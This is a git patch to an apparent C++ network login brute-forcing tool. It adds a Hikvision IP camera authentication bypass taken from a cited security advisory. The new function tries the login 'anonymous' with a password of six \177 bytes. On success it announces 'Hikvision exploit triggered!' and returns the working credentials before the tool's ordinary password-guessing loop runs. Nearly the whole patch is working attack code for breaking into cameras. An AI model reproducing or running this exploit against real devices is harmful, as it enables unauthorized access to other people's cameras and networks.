From 5789c1d4db08d2abd84204ff9d523ac06223d35d Mon Sep 17 00:00:00 2001 From: cora32 Date: Sun, 19 Apr 2015 03:02:30 +0300 Subject: [PATCH] Hikvision exploit applied (http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities) --- BasicAuth.cpp | 22 ++++++++++++++++++++++ BasicAuth.h | 2 +- 2 files changed, 23 insertions(+), 1 deletion(-) diff --git a/BasicAuth.cpp b/BasicAuth.cpp index 6961dd6..93d4137 100644 --- a/BasicAuth.cpp +++ b/BasicAuth.cpp @@ -30,6 +30,19 @@ bool BA::checkOutput(const string *buffer, const char *ip, const int port) { return false; } +//http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2 +inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode) { + std::string lpString = string("anonymous") + ":" + string("\177\177\177\177\177\177"); + + string buffer; + int res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode); + if (res == -2) return -1; + else if (res != -1) { + if (BA::checkOutput(&buffer, ip, port)) return 1; + } + return 0; +} + lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) { string buffer; string lpString; @@ -37,6 +50,15 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) { int passCounter = 0; int res = 0; + if (commenceHikvisionEx1(ip, port, digestMode)) { + stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" + + QString(ip) + ":" + + QString::number(port) + ")"); + strcpy(lps.login, "anonymous"); + strcpy(lps.pass, "\177\177\177\177\177\177"); + return lps; + } + for(int i = 0; i < MaxLogin; ++i) { for (int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;}); diff --git a/BasicAuth.h b/BasicAuth.h index eef6441..9ef3f68 100644 --- a/BasicAuth.h +++ b/BasicAuth.h @@ -8,10 +8,10 @@ class BA { private: - static bool checkOutput(const string *buffer, const char *ip, const int port); static lopaStr BABrute(const char *ip, const int port, bool digestMode); public: + static bool checkOutput(const string *buffer, const char *ip, const int port); static lopaStr BALobby(const char *ip, const int port, bool digestMode); };